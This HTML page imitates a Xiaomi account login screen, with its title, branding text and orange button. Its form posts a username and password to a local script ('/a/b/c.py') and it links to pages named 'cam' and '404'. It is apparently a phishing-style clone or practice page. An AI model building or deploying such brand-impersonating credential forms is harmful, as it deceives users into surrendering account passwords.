<!DOCTYPE html>
<html lang="zh-CN">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>登录</title>
    <link href="favicon.ico" rel="shortcut icon">
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }

        .box {
            text-align: center;
            padding: 100px;
        }

        .pa {
            font-size: 30px;
            padding: 32px;
        }

        .pb {
            margin: 15px 100px;
            border: 1px solid #ccc;
            display: block;
            margin: auto;
            width: 380px;
            height: 45px;
            padding: 20px;
            margin-bottom: 15px;
        }

        .pc {
            width: 380px;
            height: 45px;
            background-color: #ff4c00;
            border: none;
            color: white;
        }
    </style>
</head>

<body>
    <div class="box">
        <img src="./image/1.png" alt="" style="background-color:#ff4c00">
        <p class="pa">小米账号登录</p>
        </form>

        <form action="/a/b/c.py" method="POST">
            <p>
                <input type="text" placeholder="邮箱/手机/小米ID" name="xname" class="pb">

            </p>

            <p>
                <input type="password" placeholder="邮箱/手机/小米ID" name="ypwd" class="pb">
            </p>

            <p>
                <button type="submit" class="pc">登录</button>
        </form>

        <p><a href="./cam.html" target="_self">go to cam</a></p>
        <p><a href="./404.html" target="_self">go to 404</a></p>

        </p>

    </div>
</body>

</html>